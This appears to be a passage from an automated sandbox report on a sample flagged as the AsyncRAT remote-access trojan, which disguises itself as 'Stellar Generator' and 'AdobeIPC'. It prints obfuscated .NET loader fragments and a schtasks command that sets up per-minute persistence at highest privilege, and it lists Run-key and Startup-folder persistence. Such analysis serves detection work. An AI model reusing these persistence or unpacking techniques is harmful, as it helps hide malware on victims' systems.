Source: C:\ProgramData\AdobeIPC	Section loaded: uxtheme.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: sspicli.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: cryptsp.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: rsaenh.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: jcMcDQ11pZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: jcMcDQ11pZ.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: jcMcDQ11pZ.exe

Static file information: File size 2523648 > 1048576

Source: jcMcDQ11pZ.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x267800

Source: jcMcDQ11pZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: $C:\ProgramData\Stellar Generator.pdb source: jcMcDQ11pZ.exe, 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\tools\programmes\Rain Generator\Rain Generator\obj\Release\Rain Generator.pdb source: Stellar Generator.exe, 00000001.00000000.1709947841.000000000095D000.00000002.00000001.01000000.00000006.sdmp, Stellar Generator.exe.0.dr
Source:	Binary string: D:\tools\programmes\Rain Generator\Rain Generator\obj\Release\Rain Generator.pdbE source: Stellar Generator.exe, 00000001.00000000.1709947841.000000000095D000.00000002.00000001.01000000.00000006.sdmp, Stellar Generator.exe.0.dr
Source:	Binary string: !*Stellar Generator.pdb source: jcMcDQ11pZ.exe
Source:	Binary string: %Stellar Generator.pdb-=>False-=>False source: jcMcDQ11pZ.exe, 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Stellar Generator.pdb source: jcMcDQ11pZ.exe, 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: KStellar Generator.pdb-=>False-=>False source: jcMcDQ11pZ.exe

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: AdobeIPC.exe.0.dr, xLyqGwpuVDngJAR7ygvkm4XBFmOD1AHQAzvvxcZvj74RpeGAGy2N2z.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{TnXZ5NelSsKd2h2GfmCdLRn0EReRV0AYj2GfUoWaK80iRmtllcx9SI.LYv9fWNMOk4Zu1sEu98BXyzMEyOQPK20zo2P811ZyE48mCQ6caU9gU,TnXZ5NelSsKd2h2GfmCdLRn0EReRV0AYj2GfUoWaK80iRmtllcx9SI.wpafowHFmQbRjiDysG2RmvTtazFdImpvBUxQxgQTKa4wKbjZcYFNpc,TnXZ5NelSsKd2h2GfmCdLRn0EReRV0AYj2GfUoWaK80iRmtllcx9SI.vDxt50gkIWPGNW1VelrsDyNmFAOBuPJn90b34F5UxGKLjAsxdKtnLK,TnXZ5NelSsKd2h2GfmCdLRn0EReRV0AYj2GfUoWaK80iRmtllcx9SI._6hdNyQApRqcFBPAksUU131ybwiuNU5xoaMQSR9GZii3orBCjnkke8W,sdBBZUb8ihBfnvhHYXYv16FS7igqRtC1qMic9XBri8Xj2XQeIftSlA4GdJKPeIR60HkdmwU.L8IuGIPy3wASjACRUHT49VDgT5cWmCTUMQapkvyVUvQtCAmoHsOL4leWR8qzr0kq8rf8n3i()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: AdobeIPC.exe.0.dr, xLyqGwpuVDngJAR7ygvkm4XBFmOD1AHQAzvvxcZvj74RpeGAGy2N2z.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{q34wYNeY0pZUJD3Mz74fafasgx4lA9aDzkc2EoCwq47j6qKNT3rh3B0Hb89U13QNiAlqWsxGfx3CvYDzBJNDAI[2],sdBBZUb8ihBfnvhHYXYv16FS7igqRtC1qMic9XBri8Xj2XQeIftSlA4GdJKPeIR60HkdmwU.MvFcKpNjFNAXOu0WDHejWLBfKJWpw58Rz3pYDS8yY2OKITW8TQkfCnlHqhFfWRBehxprTNo(Convert.FromBase64String(q34wYNeY0pZUJD3Mz74fafasgx4lA9aDzkc2EoCwq47j6qKNT3rh3B0Hb89U13QNiAlqWsxGfx3CvYDzBJNDAI[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: AdobeIPC.exe.0.dr, xLyqGwpuVDngJAR7ygvkm4XBFmOD1AHQAzvvxcZvj74RpeGAGy2N2z.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { q34wYNeY0pZUJD3Mz74fafasgx4lA9aDzkc2EoCwq47j6qKNT3rh3B0Hb89U13QNiAlqWsxGfx3CvYDzBJNDAI[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: AdobeIPC.exe.0.dr, xLyqGwpuVDngJAR7ygvkm4XBFmOD1AHQAzvvxcZvj74RpeGAGy2N2z.cs	.Net Code: _4P3eA3JVndfRDnBYwCPShXM1xEYCV8pFB2lx6tDnPhBqMFpjYP0LIW System.AppDomain.Load(byte[])
Source: AdobeIPC.exe.0.dr, xLyqGwpuVDngJAR7ygvkm4XBFmOD1AHQAzvvxcZvj74RpeGAGy2N2z.cs	.Net Code: Lr3XX43sVBdkvQZryDXVC3CrOcoJkYzptf9kIvB5J8VFQ55VMRuVjdAqagWfoT8F77eOvuyPhPUXKIH6Rk2PQe System.AppDomain.Load(byte[])
Source: AdobeIPC.exe.0.dr, xLyqGwpuVDngJAR7ygvkm4XBFmOD1AHQAzvvxcZvj74RpeGAGy2N2z.cs	.Net Code: Lr3XX43sVBdkvQZryDXVC3CrOcoJkYzptf9kIvB5J8VFQ55VMRuVjdAqagWfoT8F77eOvuyPhPUXKIH6Rk2PQe

Source: Stellar Generator.exe.0.dr

Static PE information: 0xA80A0C31 [Sat May 3 23:39:29 2059 UTC]

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Code function: 0_2_00007FFD9B7D00AD pushad ; iretd	0_2_00007FFD9B7D00C1
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0528D1F3 push 9B0528CFh; iretd	1_2_0528D1FD
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07945604 push 8BFFFFFFh; retf	1_2_0794560A
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0794B3E5 push 8BFFFFFDh; retf	1_2_0794B3EA
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_079482A0 push ebp; iretd	1_2_079482A1
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_079490D0 pushad ; iretd	1_2_079490D1
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07967E01 push ecx; retf	1_2_07967E02
Source: C:\ProgramData\AdobeIPC.exe	Code function: 2_2_00007FFD9B7F12FA push ebx; retf	2_2_00007FFD9B7F132A
Source: C:\ProgramData\AdobeIPC.exe	Code function: 2_2_00007FFD9B7F00AD pushad ; iretd	2_2_00007FFD9B7F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B6DD2A5 pushad ; iretd	4_2_00007FFD9B6DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B7F00AD pushad ; iretd	4_2_00007FFD9B7F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B8C2316 push 8B485F92h; iretd	4_2_00007FFD9B8C231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B6ED2A5 pushad ; iretd	7_2_00007FFD9B6ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B80C2C5 push ebx; iretd	7_2_00007FFD9B80C2DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B8019D2 pushad ; ret	7_2_00007FFD9B8019E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B8000AD pushad ; iretd	7_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B8D2316 push 8B485F91h; iretd	7_2_00007FFD9B8D231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD9B6BD2A5 pushad ; iretd	12_2_00007FFD9B6BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD9B7D5F0F push ebx; iretd	12_2_00007FFD9B7D5F12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD9B7D19DA pushad ; ret	12_2_00007FFD9B7D19E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD9B7D00AD pushad ; iretd	12_2_00007FFD9B7D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD9B8A2316 push 8B485F94h; iretd	12_2_00007FFD9B8A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9B6ED2A5 pushad ; iretd	14_2_00007FFD9B6ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9B8000AD pushad ; iretd	14_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9B8D2316 push 8B485F91h; iretd	14_2_00007FFD9B8D231B
Source: C:\ProgramData\AdobeIPC	Code function: 18_2_00007FFD9B7F00AD pushad ; iretd	18_2_00007FFD9B7F00C1
Source: C:\ProgramData\AdobeIPC.exe	Code function: 19_2_00007FFD9B7F00AD pushad ; iretd	19_2_00007FFD9B7F00C1
Source: C:\ProgramData\AdobeIPC.exe	Code function: 20_2_00007FFD9B7E00AD pushad ; iretd	20_2_00007FFD9B7E00C1
Source: C:\ProgramData\AdobeIPC	Code function: 22_2_00007FFD9B8000AD pushad ; iretd	22_2_00007FFD9B8000C1

Source: jcMcDQ11pZ.exe, XxrMCzRlJKexMiGJO0rQe5.cs	High entropy of concatenated method names: '_7iyfttC9QUHRFpMtWlj9G8', 'LTStOxm6o06DpDWX1YebAa', 'EBrtFXkYAZE0l6s9dlSIaW', 'JIuTObGE4dK8fNpyherdAF', 'EkC3YjlUdmYiqFRdQayZ26', 'VzLZKsSHZ1Vxe7lMbQQdKY', '_5Us3FWuzENasWPWwCcCRoc', 'aAeGmdX2zLHrQLdglGM1ON', '_72ibmEP7aT3fTp2l2RpKY9', 'nFOBJp3PViUONe8FNuZF8f'
Source: jcMcDQ11pZ.exe, Nl6RWFakNiX82ri4jlRLlb.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'O2lj893MD3aEIHT3ocd7pJ', '_3zL2ujUnx2cfeXWwXpzlEN', 'UNu8v2RPvuvx6j6ljTFOEO', 'A4KRGpPbfxpkHdxmrHMoRX'
Source: AdobeIPC.exe.0.dr, DwVEVORXa0k6LEYwoevm3yZNBVGZjcVux2a8U7rAy4KoxuuiTrJvVYcflf35dX3FRTTou7L.cs	High entropy of concatenated method names: '_4iQdT7d8CvwfohMAAQK9lxRGO3ZKeZ4SHfSteQQzalo96B5hQvF7V0KCtx1VbB0YVnqwAu5', '_7r5nuoruIPgnzFoq2kcxah6H4D8Sba4X8Xn3hEh2UVQFLJ80NCR79dn5ISgo8NWeIEMLpP5', 'sTUQxxqefufq609QRcIme8oPRQVUbmUS3XkWIwufrDnsdm3Vi1MI6dWQ4FcXJIeMxdDKyaJ', 'LuckQ4BBIeQbM9', 'ei6z9eerq7547k', 'hx8T9Mch9refsG', 'CZrWOpxkpmHmwc', '_9m3CaP48zN87lZ', 'ht1HavQdqQpFeN', 'etIeXmsMn0Nen6'
Source: AdobeIPC.exe.0.dr, 42GOl0TRAaqhanPSkbn1cKh4nJFTFQNWzK8GFP52llPRduYQSSkxWv.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ClKiQvUsnL1WbCa89tzuoEBJRz57yMFPVQHuhDDPZq7zWjWuofUgwwAFgYe9YQDGTzkKyRa', 'VYE6ksHTgwBuRiODK1EM5DFt0hh6NZq8czdxal5EMyZrwBnq91tIKa898irO5a6gDzyptYU', 'mZKSeqgDHORImL', 'HMOiNJZglynVaa'
Source: AdobeIPC.exe.0.dr, xLyqGwpuVDngJAR7ygvkm4XBFmOD1AHQAzvvxcZvj74RpeGAGy2N2z.cs	High entropy of concatenated method names: 'xomnKdzx4nMbUQEhsuFFfYJOVnOz4QLx3Au0Iwr3QT19989gMrXfhf', '_4P3eA3JVndfRDnBYwCPShXM1xEYCV8pFB2lx6tDnPhBqMFpjYP0LIW', 'uIs3FBSOmGVd4op4qCVNqfeWSibpSUIiD4241mgD4oMTj6suCxHMyw', '_62z2E02rbhS2mFX3yAX78ub0uzy0aBSFqsgNheL6yYQ70Ep7I6KS1G', 'hAXZWUL0VwrasyFGUn42QPYYOiavATCgclBCgRVklzeYXxvgblEeaz', 'z6SSi09Txr8qk98ffIz6896zUUeDLTFdHei0n2HW2jlHsY8b0sHNY8', 'lrbXten3k5yJZM3UevoKJOLDnN8MoalArVtqDSbgyZQbbfkZrqlmS0', 'roclW7HrEwml5MapHUjfFS7yKnCcwMCPiPaCYCV3Enhjj4x4KLSBnf', 'QjxHRhpj9QHLH92OUHqd2Doft6mMFnoTFxxMWtH6bIZfDEl0v3w0Xd', 'cITS94LwZ3QdUztoVUpPhGd1N0gr4UwKVGys0FZ21Dhs22koaRBw0H'
Source: AdobeIPC.exe.0.dr, a385uvrhOk8gaPDbowFLRGLshXIADCxjr0wu3iJz6DYUUSHJNj6GxUvIy5ybfTZKYI4aN5eEnAD9v4aVqDVMDz.cs	High entropy of concatenated method names: 'usn1YuaSOuwZjTFD8wCYpM3sTDC11b07MP4SPwR38glwkadyamjE8Cbd55pV1gdLXMtTbcJGCM01j2uhdyk9rr', '_5JIdemUMLDCt3pDZXpR1LZJUdnBp71THt2gtjBJWHSzlOie109IcknvsPq7i3kTnlqhpKHibRxbz7vaA81BwjE', 'qPOF5X1w0SUgzvomSPcFzCRoXA9s3YtYV942CRc849rWRA6t3ao8O5v7LcJi9lrZITflnMswkDO9sc8FcXlbDw', 'oJymLct4KrWKev5ZaVvjnNKcDSYyVfbQomwkVN4quidAhudqso0K7EPjxmphPWeDkWBftYbqxaQetnMsIJmSgO', 'w1LPWEoOcfSExTey9vfghwkCZMr4Erw5s78w45KBfIPBW5UvuJ1MHo2ZGUaWpYZSRMNRYyDkimClhx8RYqO7HE', 'y9R8a3MT7cWHMWLBep3rEoTmbudAkbQbcjrpcFVyEIXyGtb1jiKO7MuHfTNL4U9ieJmKoLjq2yM18RfJxSHikj', 'MWPPgKpeOUTeiaW4RdtRINdit5OSKuxiRBkW2RXOE2ZVJ9Ny91CAmi2DvwGNQ1hOs1XB32yT8hqiHL1M418sKs', 'hEiFQVEJJcUR6QN0h5Xqv2R0rzrJRNzZEo0l4pcgZaS7DAGNrIRmjmDN1Or2TDElFSptQPRfOiS4Xg395x6ZBR', 'zQsZSIu0ifb9dLhRQSOovvhQw6Eq39xFF9biSRKpcmP7tiJk9QWOuzz406HF0tmnfOsMdU4O9jjZac0pT3u9xa', 'n5anullFst3ilk2V4abnedECt67tBCiqA7QuByARIFSjlZzcR3rF5E3ZqmdeMhM0ncYeQDhhsGTyW0MZItk4DC'
Source: AdobeIPC.exe.0.dr, ZeafdKOuQAsPvepznrLMyG9IcGmO2YmjtRHNedHE37ccoL5fG1ROUQ.cs	High entropy of concatenated method names: 'UCKgsSyO9YYAsQlQxR41D39TilPK7mJQudtitpqRYUf8EAlj4KQLSF', 'nS8VmyCawP6n6XG3IOpXneE7m46LoyRB8bSf3lXVqOO6zLxkMQa4RD', '_2rZ0jYNqA38RPeBaLc90QrhN6N3QqT3PrmzXhgjzu6BTuc5U6hx3tt', 'Fykc1QrhvcSeRUjJSeTybsFNqFrzw1bPJe70wzaQdoV0YoInAItgrQ', 'ij9wBJ9SZrg44dTB06UMUE003LpmPxWMurY4lGdqjP9eInKlTesZ3T', 'FR372aLwcbSuqPVF5YlbytCDDnNcAfqaFUhO6CkfVROxmyVodRz1px', 'lDubYrlGe7u45w', 'y6ZXeiEouaxNki', 'zmKFEZB226Xvp5', '_8WN99JAusLmOvi'
Source: AdobeIPC.exe.0.dr, EENsKBXj9If4zl9BgUFZK0AQ4c67dsMS7d04eXpCjVnRb2KQZup5tMy6gHiUKhmiwIj78Bk9vufCT4MgWL1qQd.cs	High entropy of concatenated method names: 'S2aTVR7vIQwnTcQ6CTDfeWHz8mK1l2cMWtguCO6bGUJ82GHMPrDD3H1Qw2cLDCArDxLpBvWRyEkTCcivHAER90', 'lsQ4JdJN5boB2o', 'iSXac5TOalxcAt', 'mfTKr0M43cd6SH', 'DCmviZJSsf0EJU'
Source: AdobeIPC.exe.0.dr, pwQiXouLVN1VCfvmNj63gtdkbSoOiCXIXkcN4rR5BAMfhUjMdaPIP8PqXZWKcuqrB9Ez6bk.cs	High entropy of concatenated method names: 'cwNdWVYLl7FMAW6AMdDrVm65qCKleHVXW1L4afkrkiOzSmIDUVVdoCvLiz9j4fD8rB7cnG7', 'VV3uKmGVqIrInMXjXlFd9rtfqOUWtM9q5yPSYK1WND8nAmTOwLl4BUov3cqNbQEYPfBrQXC', 'PM1Hp2LsrBC8Rvq42PvM3jU8LrdB3LI3tS9jMyoJTNMhzkBXJ8tNcDlPJzVZWVfLNJpQU4e', 'NOe0DuXgjjkE2XZDgXF7dth516gs0plEQeE5otUpta59O76NF1ZJ8Oy8noKdRtVWhFAs2Tx', 'cqZ4pIVYyvXXDv', 'awkyWQtW7uYHvV', 'hu8L9aWw4PxMdg', 'uB6R4nzPEqSgIz', 'skLLZVOVxUwqtC', 'YWpb6lmHpcxMHT'
Source: AdobeIPC.exe.0.dr, LntDY2IhXEuXaGfzCW2VAtwJLDlCFdkQcuX2sazFTQbIqpnWdFiD5S.cs	High entropy of concatenated method names: 'ul8fthY7LLq05c52RcyNvNrJlfnhHB6UN0fxJPF6HcxA2pIbstIKNM', 'G7vo49FMzSXDUrMAiad0xCFBaVYDP3bsyj8KPfrt0kwTwL4bdPpWjR', 'bK7WonU1TPUITVxYGnQw6G6WcE3Ea8dd3g4jnPdg9BN9VbVUPMrSBy', 'CRzKmDARNW5zZvzPplAyeTeDgHzaTwwg780aVProDS3HSzOFXgGpBO', 'OxZehuL9TKisla60kz6wQ6VF99e98qDGexQgwlpGKSNnWTKr2zAx1u', 'fBdBfO11228Am3ZwmUPA8O3VintuiqPSW3n5IAARohoiCHNPhhZEBk', 'sYWQNh2IgmK9YlKrCJyo8GMXsTDN4L9kvJukcbkgcfvStwjoQNSREw', 'Qk6IaY85qf2wQKm4ABTsLxm4PwXZXA92AwWwfTxL9Gh6EYoJFgJeGM', 'v0rWoSivlUbuoGkadWKPA7QBlisAuQf4VOojdv601zpSPvhgP0mHV6', 'ue8CqKUnhzaoz4s42bpB2EHGUEYQHAstHYNVBNkM9jgkO9b7DuV4Dh'
Source: AdobeIPC.exe.0.dr, sdBBZUb8ihBfnvhHYXYv16FS7igqRtC1qMic9XBri8Xj2XQeIftSlA4GdJKPeIR60HkdmwU.cs	High entropy of concatenated method names: 'zPnhI38sQdn2IkTZxTF1gEGhR35Db0ImKvUY43ru2oYHJf3CBQ15s5aiRWK0iqTHJ5Qmcp7', 'tYVsDZt05XuSb0nOEVltFlJ11z9tRWECURcNyNoZsTZgmPdxSGjvJmVzCpYyqn5XCPrHTYR', 'LPPKWAygOBq5Y9cZ1UaFCHo2QmWYts6GYDlrPCScEe5yLGrPHILEP1ggTPwaMMLJl00vqND', 'waOgjVBE2d4c5DDRzkP4GzZbzp8N47HyJWcHdph1AEG4mgCGF4O1xKjK3iNyu6VDolYhfZh', 'WkjzuMUwCzoAvrvSYKE8l6tlrKlmn7CToaxQu6wVhww27vfLXaNhyzHVbnn56x3iBC4r9e0', 'PtKp5yA40yt5zRWqNim8fOEN7mRZQUzxWlOs0FA6qGPJ3qeRjgqMXdzUaTKzCTqSCv5pCMg', '_5JUFyV8IhDptFctwStTC2jOXX1Aq79wRqn6wq7bxA0ALGZqgvpVWp0IXohRnKo68kgZbzjp', 'O3LLEUDiwiAYWSBtGHqIOSJtHXzZMC8lWQgWTSUnFLGnJMWAR22DuiSJXtA39amy51OcBlZ', '_3tqxQgCspgibE7fMgw0lplAR3hgfdvBW5D5ZMME4dolb4jB0X1ZEnPFyHoIRke7WgtlQ02j', 'mSbnUpSjzS2UVc8rrCMaALDLPefZOuSbWXWQv5gGrCUXEdEU6xV0LchXcee4TJkt7WeSvjm'

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	File created: C:\ProgramData\Guna.UI2.dll	Jump to dropped file
Source: C:\ProgramData\AdobeIPC.exe	File created: C:\ProgramData\AdobeIPC	Jump to dropped file
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	File created: C:\ProgramData\Stellar Generator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	File created: C:\ProgramData\AdobeIPC.exe	Jump to dropped file

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	File created: C:\ProgramData\Guna.UI2.dll	Jump to dropped file
Source: C:\ProgramData\AdobeIPC.exe	File created: C:\ProgramData\AdobeIPC	Jump to dropped file
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	File created: C:\ProgramData\Stellar Generator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	File created: C:\ProgramData\AdobeIPC.exe	Jump to dropped file

Source: C:\ProgramData\AdobeIPC.exe

File created: C:\ProgramData\AdobeIPC

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: AdobeIPC.exe PID: 7364, type: MEMORYSTR

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\ProgramData\AdobeIPC.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AdobeIPC" /tr "C:\ProgramData\AdobeIPC"

Source: C:\ProgramData\AdobeIPC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AdobeIPC.lnk

Jump to behavior

Source: C:\ProgramData\AdobeIPC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AdobeIPC.lnk

Jump to behavior

Source: C:\ProgramData\AdobeIPC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeIPC			Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeIPC			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
